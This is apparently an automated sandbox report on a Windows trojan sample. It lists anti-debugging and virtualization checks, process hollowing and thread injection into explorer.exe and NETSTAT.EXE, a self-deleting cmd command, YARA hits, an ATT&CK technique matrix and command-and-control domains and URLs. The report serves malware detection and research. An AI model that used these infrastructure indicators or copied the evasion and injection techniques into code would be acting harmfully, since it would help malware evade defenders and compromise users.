          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0338E730 mov eax, dword ptr fs:[00000030h] 10_2_0338E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A185 mov eax, dword ptr fs:[00000030h]10_2_0338A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03352D8A mov eax, dword ptr fs:[00000030h]10_2_03352D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0335B1E1 mov eax, dword ptr fs:[00000030h]10_2_0335B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033E41E8 mov eax, dword ptr fs:[00000030h]10_2_033E41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336D5E0 mov eax, dword ptr fs:[00000030h]10_2_0336D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336D5E0 mov eax, dword ptr fs:[00000030h]10_2_0336D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034205AC mov eax, dword ptr fs:[00000030h]10_2_034205AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034205AC mov eax, dword ptr fs:[00000030h]10_2_034205AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov ecx, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6DC9 mov eax, dword ptr fs:[00000030h]10_2_033D6DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338BC2C mov eax, dword ptr fs:[00000030h]10_2_0338BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338002D mov eax, dword ptr fs:[00000030h]10_2_0338002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336B02A mov eax, dword ptr fs:[00000030h]10_2_0336B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D7016 mov eax, dword ptr fs:[00000030h]10_2_033D7016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03412073 mov eax, dword ptr fs:[00000030h]10_2_03412073
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03421074 mov eax, dword ptr fs:[00000030h]10_2_03421074
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6C0A mov eax, dword ptr fs:[00000030h]10_2_033D6C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03411C06 mov eax, dword ptr fs:[00000030h]10_2_03411C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0342740D mov eax, dword ptr fs:[00000030h]10_2_0342740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03424015 mov eax, dword ptr fs:[00000030h]10_2_03424015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03424015 mov eax, dword ptr fs:[00000030h]10_2_03424015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0337746D mov eax, dword ptr fs:[00000030h]10_2_0337746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03370050 mov eax, dword ptr fs:[00000030h]10_2_03370050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03370050 mov eax, dword ptr fs:[00000030h]10_2_03370050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EC450 mov eax, dword ptr fs:[00000030h]10_2_033EC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EC450 mov eax, dword ptr fs:[00000030h]10_2_033EC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338A44B mov eax, dword ptr fs:[00000030h]10_2_0338A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov ecx, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov eax, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0338F0BF mov eax, dword ptr fs:[00000030h]10_2_0338F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03428CD6 mov eax, dword ptr fs:[00000030h]10_2_03428CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033990AF mov eax, dword ptr fs:[00000030h]10_2_033990AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033820A0 mov eax, dword ptr fs:[00000030h]10_2_033820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0336849B mov eax, dword ptr fs:[00000030h]10_2_0336849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03359080 mov eax, dword ptr fs:[00000030h]10_2_03359080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D3884 mov eax, dword ptr fs:[00000030h]10_2_033D3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D3884 mov eax, dword ptr fs:[00000030h]10_2_033D3884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034114FB mov eax, dword ptr fs:[00000030h]10_2_034114FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033D6CF0 mov eax, dword ptr fs:[00000030h]10_2_033D6CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033558EC mov eax, dword ptr fs:[00000030h]10_2_033558EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov ecx, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_033EB8D0 mov eax, dword ptr fs:[00000030h]10_2_033EB8D0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 1_2_00EB1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EB1D88
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 1_2_00EB1D57 SetUnhandledExceptionFilter,1_2_00EB1D57
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 2_2_00EB1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00EB1D88
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Code function: 2_2_00EB1D57 SetUnhandledExceptionFilter,2_2_00EB1D57

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Domain query: www.savingshk.com
          Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1180000
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Thread register set: target process: 684
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 684
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exe Process created: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"
          Source: explorer.exe, 00000003.00000000.516249956.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.512096551.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.497020918.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.506026358.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.453908478.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
          Source: explorer.exe, 00000003.00000000.486135507.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.565839731.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.453908478.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,2_2_00EA67B8
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: GetLocaleInfoW,2_2_00EB9FDB
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00EBE799
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB00A3 cpuid 1_2_00EB00A3
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 1_2_00EB161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00EB161F

          Stealing of Sensitive Information

          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Native API | Path Interception | 512 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 3 Obfuscated Files or Information | 1 Input Capture | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Credential API Hooking | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Rootkit | NTDS | 123 System Information Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 512 Process Injection | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Behavior Graph
          ID: 635319, Sample: O1ySvN9SvL, Startdate: 27/05/2022, Architecture: WINDOWS, Score: 100
          Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures
          Sample-level DNS/IP: www.viatempo.com
          Process chain:
          O1ySvN9SvL.exe (started)
            dropped: C:\Users\user\AppData\Local\Temp\zrztlh.exe, PE32
          -> zrztlh.exe (started)
            signatures: Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements
          -> zrztlh.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          -> explorer.exe (injected)
            DNS/IP: www.savingshk.com 188.114.97.3, 49798, 80 CLOUDFLARENETUS European Union
            signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
          -> NETSTAT.EXE (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          -> cmd.exe (started)
          -> conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          O1ySvN9SvL.exe | 49% | Virustotal | | Browse
          O1ySvN9SvL.exe | 54% | ReversingLabs | Win32.Trojan.GenericML |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\zrztlh.exe | 50% | ReversingLabs | Win32.Trojan.GenericML |

          Source | Detection | Scanner | Label | Link | Download
          1.2.zrztlh.exe.730000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.2.zrztlh.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.zrztlh.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.zrztlh.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.zrztlh.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          http://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf | 0% | Avira URL Cloud | safe |
          www.knoxvillehojo.com/a5vu/ | 100% | Avira URL Cloud | malware |
          https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3S | 0% | Avira URL Cloud | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.viatempo.com | 216.120.146.201 | true | false | | unknown
          www.savingshk.com | 188.114.97.3 | true | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf | true | Avira URL Cloud: safe | unknown
          www.knoxvillehojo.com/a5vu/ | true | Avira URL Cloud: malware | low

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3S | NETSTAT.EXE, 0000000A.00000002.719201108.0000000003D4F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              188.114.97.3 | www.savingshk.com | European Union | | 13335 | CLOUDFLARENETUS | true
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:635319
              Start date and time: 2022-05-27 19:09:02 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 14s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:O1ySvN9SvL (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:25
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@9/4@2/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 58.8% (good quality ratio 55%)
              • Quality average: 75.6%
              • Quality standard deviation: 30.2%
              HCA Information:
